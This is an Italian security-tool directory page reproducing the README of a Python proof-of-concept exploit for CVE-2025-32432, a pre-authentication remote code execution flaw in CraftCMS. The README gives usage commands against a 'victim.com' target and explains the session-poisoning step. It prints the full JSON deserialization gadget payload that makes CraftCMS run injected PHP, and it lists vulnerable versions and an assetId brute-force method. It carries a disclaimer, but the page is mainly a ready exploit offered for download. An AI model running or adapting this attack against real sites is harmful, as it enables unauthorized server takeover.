Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/cty-research-1/cve-2025-32432-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubcty-research-1/cve-2025-32432-poc

CVE-2025-32432-PoC

Exploit Python per CVE-2025-32432, una RCE pre-autenticazione nell'endpoint asset-transform di CraftCMS. Include una catena a due pacchetti per eseguire comandi shell arbitrari tramite gadget di deserializzazione.

Vedi Repository
6411 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Script di Exploit CVE-2025-32432 (PoC Python)

Esecuzione di codice remoto pre-autenticazione per CraftCMS 3.x / 4.x / 5.x
Manutentore PoC: C.T.Y. (solo per ricerca)
Scoperta vulnerabilità: Nicolas Bourras – Orange Cyberdefense
Ispirazione PoC aggiuntiva: ricerche SensePost e script pubblico di Chirag Artani


1. Panoramica

Questo repository contiene due exploit Python complementari per CVE-2025-32432 — una RCE pre-autenticazione nell'endpoint asset-transform di CraftCMS.

ScriptScopo
craftcms_rce_php_check.pySonda di sicurezza — invia una richiesta usando il gadget FnStream per verificare se PHP arbitrario viene eseguito (stampa l'output di phpinfo()). Ideale per conferma a basso impatto.
craftcms_final_payload.pyExploit completo — catena a due pacchetti: prima inietta PHP tramite FnStream, poi sfrutta il gadget FieldLayoutBehavior → PhpManager per eseguire qualsiasi comando shell.

Il secondo script è quello descritto in questo README.
Il primo script è incluso per completezza e validazione rapida, per gentile concessione di Chirag Artani — vedi Crediti.
Il nome del file dello script è stato adattato per chiarezza; struttura e idea originali di Chirag Artani.


2. Dichiarazione di non responsabilità 🚨

Solo per test di sicurezza educativi e autorizzati.
Usare questi script contro sistemi senza autorizzazione scritta esplicita è illegale e non etico.


3. Caratteristiche (payload finale)

  • RCE a due pacchetti in un colpo solo
  • Brute-force automatico di assetId (euristica 404 → 302)
  • Esecuzione di comandi shell personalizzati (-c/--cmd)
  • Funziona su HTTP o HTTPS (avvisi di verifica SSL soppressi)
  • Estrazione pulita dell'output del comando dalla risposta HTML

4. Requisiti

  • Python 3.8+
  • Pacchetti PyPI (installare tramite pip install -r requirements.txt):
    • requests
    • urllib3

5. Installazione

root@kitploit:~
# Clona il repo
git clone https://github.com/CTY-Research-1//CVE-2025-32432-2pkt.git
cd CVE-2025-32432-2pkt

# Installa le dipendenze
pip install -r requirements.txt

6. Utilizzo

6.1 Controllo rapido esecuzione PHP

root@kitploit:~
python3 craftcms_rce_php_check.py -u https://victim.com

Se vedi l'output di phpinfo(), il target è molto probabilmente sfruttabile.

6.2 Exploit completo a due pacchetti

root@kitploit:~
python3 craftcms_final_payload.py -u https://victim.com -c "id"

Opzioni

OpzioneForma lungaDescrizioneObbligatorio
-u--urlURL base del target (senza slash finale)✅
-c--cmdComando shell da eseguire✅
-a--assetassetId noto valido❌
-s--scan-maxLimite di brute force (default: 300)❌

7. Come funziona la vulnerabilità (riepilogo)

  • Session Poisoning — GET a /index.php?p=admin/dashboard&a=<?=...?> scrive PHP arbitrario in /tmp/sess_<ID>.
  • Gadget di deserializzazione — POST a actions/assets/generate-transform con un gadget FieldLayoutBehavior → PhpManager forza CraftCMS a eseguire require() del file di sessione, eseguendo il codice.
root@kitploit:~
{
  "assetId": 11,
  "handle": {
    "width": 1,
    "height": 1,
    "as hack": {
      "class": "craft\\behaviors\\FieldLayoutBehavior",
      "__class": "yii\\rbac\\PhpManager",
      "__construct()": [
        {
          "itemFile": "/tmp/sess_<SessionID>"
        }
      ]
    }
  }
}

8. Versioni testate

  • CraftCMS < 3.9.15 (richiede brute-force di assetId)
  • CraftCMS < 4.14.15
  • CraftCMS < 5.6.17

9. Riferimenti e letture consigliate

  • Avviso originale — Nicolas Bourras / Orange Cyberdefense
  • Blog approfondito di SensePost
  • PoC di Chirag Artani
  • Avviso di sicurezza CraftCMS
  • CVE-2025-32432 @ MITRE

10. Crediti

  • C.T.Y. — PoC completo a due pacchetti e documentazione
  • Chirag Artani — Script originale di controllo phpinfo (craftcms_rce_php_check.py) e prime idee di ricerca Il nome del file dello script è stato adattato per chiarezza; struttura e idea originali di Chirag Artani.
  • Nicolas Bourras / Orange Cyberdefense — Scoperta della vulnerabilità e divulgazione responsabile
  • Ulteriori approfondimenti dal team di ricerca SensePost

11. Licenza

Avviso di responsabilità: Qualsiasi rischio legale o danno derivante dall'uso di questo codice è di esclusiva responsabilità dell'utente.

Licenza MIT — vedi LICENSE.


Spiegazione in cinese

1. Contenuto del progetto

FileScopo
craftcms_rce_php_check.pyVerifica di esecuzione PHP: una singola richiesta, utilizza FnStream per attivare phpinfo(), verificando a basso impatto se il target è vulnerabile.
Il nome del file è stato adattato per chiarezza; struttura e idea originali di Chirag Artani.
craftcms_final_payload.pyExploit completo a due pacchetti: prima inietta PHP con FnStream, poi esegue comandi arbitrari tramite PhpManager.

2. Dichiarazione di non responsabilità

Solo per uso didattico e test autorizzati. Operare senza autorizzazione è illegale.


3. Controllo rapido

root@kitploit:~
python3 craftcms_rce_php_check.py -u https://target

4. Exploit completo

root@kitploit:~
python3 craftcms_final_payload.py -u https://target -c "id"

I parametri sono uguali alla versione inglese.


5. Ringraziamenti

  • Chirag Artani — Script di controllo phpinfo Il nome del file è stato adattato per chiarezza; struttura e idea originali di Chirag Artani.
  • Nicolas Bourras / Orange Cyberdefense — Scoperta della vulnerabilità e ispirazione tecnica
  • SensePost — Ispirazione tecnica

6. Licenza

Qualsiasi rischio legale o danno derivante dall'uso di questo codice è di esclusiva responsabilità dell'utente.

Licenza MIT

Scarica lo strumento